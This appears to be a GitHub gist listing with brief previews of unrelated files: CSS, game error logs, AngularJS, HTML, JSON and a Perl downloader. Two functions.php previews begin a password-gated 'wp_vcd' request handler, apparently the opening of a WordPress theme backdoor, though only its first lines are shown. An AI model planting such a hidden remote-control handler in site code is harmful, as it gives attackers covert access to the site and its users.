View functions.php
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '6c3d5d888564dfe7caebc8b8c75575e7')) | |
{ | |
$div_code_name="wp_vcd"; | |
switch ($_REQUEST['action']) | |
{ | |
View functions.php
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '6c3d5d888564dfe7caebc8b8c75575e7')) | |
{ | |
$div_code_name="wp_vcd"; | |
switch ($_REQUEST['action']) | |
{ | |
View One.css
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
@import url('https://fonts.googleapis.com/css?family=Lato|Lato'); | |
/*! | |
* Default theme for Pingendo | |
* Homepage: http://pingendo.com | |
* Copyright 2015 Pingendo | |
* Licensed under MIT | |
* Based on Bootstrap v3.3.4 | |
*/ | |
/* Add custom CSS classes here | |
* |
View error.txt
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
RAGE Plugin Hook v0.36.877.6833 PUBLIC ALPHA | |
Game: Grand Theft Auto V | |
Game build: 617 | |
Branch: Steam | |
===== .NET exception information ===== | |
Type: System.Net.WebException | |
Message: Unable to connect to the remote server |
View error.txt
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
RAGE Plugin Hook v0.36.877.6833 PUBLIC ALPHA | |
Game: Grand Theft Auto V | |
Game build: 617 | |
Branch: Steam | |
===== .NET exception information ===== | |
Type: System.Net.WebException | |
Message: Unable to connect to the remote server |
View cont.js
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
.controller('ApptsController', function($scope, $http, $state, $rootScope) { | |
$scope.postData = function (time, date) { | |
// don't use console.log, but debugger, it's much handier | |
console.log(" Appointment Times Listed"); | |
$http({ | |
method: 'GET', | |
url: 'https://api.parse.com/1/classes/appointments', | |
params: { |
View working.html
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<head> | |
<link href="https://vjs.zencdn.net/5.4.6/video-js.css" rel="stylesheet"> | |
| |
<!-- If you'd like to support IE8 --> | |
<script src="https://vjs.zencdn.net/ie8/1.1.1/videojs-ie8.min.js"></script> | |
</head> | |
| |
<body> | |
<br> | |
<center> |
View data.json
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
[ | |
{ | |
"name": "Andrew Chalkley", | |
"profile_name": "chalkers", | |
"profile_url": "https://teamtreehouse.com/chalkers", | |
"gravatar_url": "https://uploads.teamtreehouse.com/production/profile-photos/26170/avatar_TeacherShoot-Andrew.jpg", | |
"gravatar_hash": "7139178cce7d4441b3ea43af22600e8b", | |
"badges__id": 49, | |
"badges__name": "Newbie", | |
"badges__url": "https://teamtreehouse.com/chalkers", |
View data.json
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
[ | |
{ | |
"id":49, | |
"name":"Newbie", | |
"url":"https://teamtreehouse.com/chalkers", | |
"icon_url":"http://i.giphy.com/SvgmMm20VGHzq.gif", | |
"earned_date":"2012-07-23T19:59:34.000Z", | |
"courses/0/title":"", | |
"courses/0/url":"", | |
"courses/0/badge_count":"", |
View youtube_wget.pl
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/perl -T | |
use strict; | |
use warnings; | |
# | |
## Calomel.org ,:, Download Youtube videos and music using wget | |
## Script Name : youtube_wget_video.pl | |
## Version : 0.54 | |
## Valid from : May 2015 |
NewerOlder